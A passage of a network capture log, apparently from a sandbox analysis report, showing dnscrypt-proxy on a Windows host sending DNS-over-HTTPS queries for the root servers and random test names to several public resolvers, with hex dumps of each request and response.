                                                                                                                            2024-03-12 15:34:45 UTC260INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 1b 13 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 1b 13 00 04 01 6c c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 6d c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 61 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 62 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 63 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 64 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 65 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 66 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 67 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 68 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 69 c0 1e 00 00 02 00 01 00 00 1b 13 00 04 01 6a c0 1e 00 00 29 04 d0 00 00 00 00 00 15 00 0c 00 11 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: kroot-serversnetlmabcdefghij)XXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            60192.168.2.54980495.215.19.534437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:51 UTC268OUTPOST /dns-query?body_hash=4aec1493ed5c217820857d18d001ee2a6a547c0e186adcdd1a96e5275f60e545 HTTP/1.1
                                                                                                                            Host: dns.njal.la
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:51 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 17 67 5f aa 3c e6 22 91 54 50 5f 25 9e 5e 35 bc
                                                                                                                            Data Ascii: )g_<"TP_%^5
                                                                                                                            2024-03-12 15:34:51 UTC127INHTTP/1.1 400 Bad Request
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:51 GMT
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            61192.168.2.54980595.215.19.534437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:51 UTC202OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABAXZ1-qPOYikVRQXyWeXjW8 HTTP/1.1
                                                                                                                            Host: dns.njal.la
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:34:52 UTC276INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:51 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 823
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=9847
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            2024-03-12 15:34:52 UTC823INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 00 26 77 00 14 01 65 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 c0 11 00 02 00 01 00 00 26 77 00 04 01 6b c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 68 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 67 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 62 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 64 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 63 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 61 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 6c c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 66 c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 6a c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 6d c0 1e c0 11 00 02 00 01 00 00 26 77 00 04 01 69 c0 1e c0 9c 00 01 00 01 00 00 4e 05 00 04 c6 29 00
                                                                                                                            Data Ascii: &weroot-serversnet&wk&wh&wg&wb&wd&wc&wa&wl&wf&wj&wm&wiN)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            62192.168.2.54980695.215.19.534437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:52 UTC244OUTGET /dns-query?dns=yv4BAAABAAAAAAABEGlxaGJvYWltYWZzZGlhcWUEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQ82Vwmw5wtmYq_A9KVysKOg HTTP/1.1
                                                                                                                            Host: dns.njal.la
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:34:53 UTC275INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:53 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=115
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            2024-03-12 15:34:53 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 69 71 68 62 6f 61 69 6d 61 66 73 64 69 61 71 65 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 00 73 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: iqhboaimafsdiaqetestdnscrypts@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            63192.168.2.549808146.255.56.984437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:01 UTC275OUTPOST /query?body_hash=13c96d569f5542e5b37c55a230dfd2e87a18f0e8cba266add5258f12d67bc000 HTTP/1.1
                                                                                                                            Host: doh.appliedprivacy.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:01 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 a9 69 96 8b ea b4 c8 30 d0 6d f5 ec d3 4c c6 fa
                                                                                                                            Data Ascii: )i0mL
                                                                                                                            2024-03-12 15:35:02 UTC178INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:36 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 468
                                                                                                                            Server: doh
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=37854
                                                                                                                            2024-03-12 15:35:02 UTC468INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 93 de 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 93 de 00 04 01 6c c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 61 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 69 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 67 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 65 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 62 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 6d c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 63 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 66 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 6a c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 68 c0 1e 00 00 02 00 01 00 00 93 de 00 04 01 64 c0 1e 00 00 29 02 00 00 00 00 00 00 e5 00 0c 00 e1 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: kroot-serversnetlaigebmcfjhd)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            64192.168.2.549809146.255.56.984437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:03 UTC275OUTPOST /query?body_hash=1cea77e4e5fb604d63964d3ca23fc0aaef54ded5b5ac1f6d1eb54304eb0e2dca HTTP/1.1
                                                                                                                            Host: doh.appliedprivacy.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:03 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 7a 65 6e 7a 61 6b 70 6e 6d 71 6d 77 68 75 6c 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 c3 8e bb 2a 51 0d fd f2 80 71 39 31 a8 ef f3 51
                                                                                                                            Data Ascii: zenzakpnmqmwhulutestdnscrypt)*Qq91Q
                                                                                                                            2024-03-12 15:35:03 UTC177INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:37 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 509
                                                                                                                            Server: doh
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=3478
                                                                                                                            2024-03-12 15:35:03 UTC509INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 7a 65 6e 7a 61 6b 70 6e 6d 71 6d 77 68 75 6c 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 0d 96 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 02 00 00 00 00 00 01 77 00 0c 01 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: zenzakpnmqmwhulutestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)wJ


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            65192.168.2.549810185.95.218.424437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:03 UTC285OUTPOST /dns-query?body_hash=da4d7138a52ec640d75a5a99e130651a7b53cf7c9f716ace4d279002a272c837 HTTP/1.1
                                                                                                                            Host: dns.digitale-gesellschaft.ch
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:03 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 61 75 94 eb 82 40 a6 88 23 72 9c c7 04 1e 75 a0
                                                                                                                            Data Ascii: )au@#ru
                                                                                                                            2024-03-12 15:35:04 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:04 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 239
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=48995
                                                                                                                            2024-03-12 15:35:04 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 bf 63 00 14 01 63 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 bf 63 00 04 01 6a c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 6b c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 62 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 6d c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 66 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 69 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 6c c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 64 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 61 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 67 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 65 c0 1e 00 00 02 00 01 00 00 bf 63 00 04 01 68 c0 1e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: ccroot-serversnetcjckcbcmcfciclcdcacgcech)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            66192.168.2.549811185.95.218.424437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:04 UTC285OUTPOST /dns-query?body_hash=749d470bac887720e17b1156160246c860d588aa1a6d22f1fcfb7b692192ecd6 HTTP/1.1
                                                                                                                            Host: dns.digitale-gesellschaft.ch
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:04 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6e 68 6b 7a 71 76 73 66 77 61 73 6e 64 79 6e 64 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 62 b9 55 d3 e4 5b 2f da 15 3b 59 cd 9a a5 f4 b4
                                                                                                                            Data Ascii: nhkzqvsfwasndyndtestdnscrypt)bU[/;Y
                                                                                                                            2024-03-12 15:35:04 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:04 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=51085
                                                                                                                            2024-03-12 15:35:04 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6e 68 6b 7a 71 76 73 66 77 61 73 6e 64 79 6e 64 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 c7 8d 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: nhkzqvsfwasndyndtestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            67192.168.2.549812185.222.222.2224437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:11 UTC272OUTPOST /dns-query?body_hash=d3ee92d3fe71e0b593f9cf819796b311f7a8e4ae21cea285ae4d89746cf0a3df HTTP/1.1
                                                                                                                            Host: 185.222.222.222
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:11 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 d5 33 ec e9 7e f2 13 5d f5 aa 1f eb b7 e3 42 f5
                                                                                                                            Data Ascii: )3~]B
                                                                                                                            2024-03-12 15:35:11 UTC709INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:11 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 431
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Cache-Control: private, max-age=51084
                                                                                                                            Expires: Wed, 13 Mar 2024 05:46:35 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:35:11 GMT
                                                                                                                            Vary: Accept
                                                                                                                            Server: Mac-Studio/2024
                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            2024-03-12 15:35:11 UTC431INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 c7 8c 00 14 01 62 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 65 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 64 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 63 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 66 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 c7 8c 00 14 01 6a 0c 72 6f 6f 74 2d 73 65
                                                                                                                            Data Ascii: broot-serversneteroot-serversnetdroot-serversnetcroot-serversnetfroot-serversnetmroot-serversnetaroot-serversnetjroot-se


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            68192.168.2.549813185.222.222.2224437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:11 UTC272OUTPOST /dns-query?body_hash=f2a9783842eb38708b93f5d2a545cb31a3218612ef58932b05bf5099683164ed HTTP/1.1
                                                                                                                            Host: 185.222.222.222
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:11 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 79 61 74 66 74 79 78 61 6e 76 6d 6c 6f 6c 64 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 6f a2 ff d5 93 1b bd 8d 6c e4 67 dd 82 2d 91 8d
                                                                                                                            Data Ascii: yatftyxanvmloldytestdnscrypt)olg-
                                                                                                                            2024-03-12 15:35:12 UTC709INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:12 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Cache-Control: private, max-age=86385
                                                                                                                            Expires: Wed, 13 Mar 2024 15:34:57 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:35:12 GMT
                                                                                                                            Vary: Accept
                                                                                                                            Server: Mac-Studio/2024
                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            2024-03-12 15:35:12 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 79 61 74 66 74 79 78 61 6e 76 6d 6c 6f 6c 64 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 71 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 02 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: yatftyxanvmloldytestdnscryptQq@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            69192.168.2.549814199.119.65.944437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:19 UTC276OUTPOST /dnscrypt-proxy?body_hash=670733e200aed9a4f429b7984a02c12e9e960aefea0d76661b1ff693bc6d5c19 HTTP/1.1
                                                                                                                            Host: dns.nextdns.io
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:19 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 33 b1 1b 42 eb cc 3a 40 3c e9 e3 a0 c3 9a 4e 0f
                                                                                                                            Data Ascii: )3B:@<N
                                                                                                                            2024-03-12 15:35:19 UTC208INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:19 GMT
                                                                                                                            Content-Length: 239
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:35:19 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 57 56 00 14 01 67 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 57 56 00 04 01 68 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 69 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 6a c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 6b c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 6c c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 6d c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 61 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 62 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 63 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 64 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 65 c0 1e 00 00 02 00 01 00 00 57 56 00 04 01 66 c0 1e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: WVgroot-serversnetWVhWViWVjWVkWVlWVmWVaWVbWVcWVdWVeWVf)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            70192.168.2.549815199.119.65.944437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:19 UTC276OUTPOST /dnscrypt-proxy?body_hash=55c1c17cd8c06bf65da897658a87e33ecd96d5b06618bc0090560130eca57d93 HTTP/1.1
                                                                                                                            Host: dns.nextdns.io
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:19 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 75 73 70 78 6d 62 61 7a 63 6b 61 61 6d 79 6f 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 b7 d0 16 57 6f 4a 43 7f 93 e4 00 01 ea e2 56 b7
                                                                                                                            Data Ascii: uspxmbazckaamyoytestdnscrypt)WoJCV
                                                                                                                            2024-03-12 15:35:19 UTC208INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:19 GMT
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:35:19 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 75 73 70 78 6d 62 61 7a 63 6b 61 61 6d 79 6f 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 0a 44 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: uspxmbazckaamyoytestdnscryptD@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            71192.168.2.549817194.242.2.24437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:25 UTC206OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBfji9BqSLQ5S3eeoEsgAEi HTTP/1.1
                                                                                                                            Host: dns.mullvad.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            72192.168.2.54981894.130.135.2034437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:38 UTC276OUTPOST /dns-query?body_hash=ca35c494eab9b4df56df4510b222a9c90d579ce04429a13c55aa0b173239b101 HTTP/1.1
                                                                                                                            Host: dns.digitalsize.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
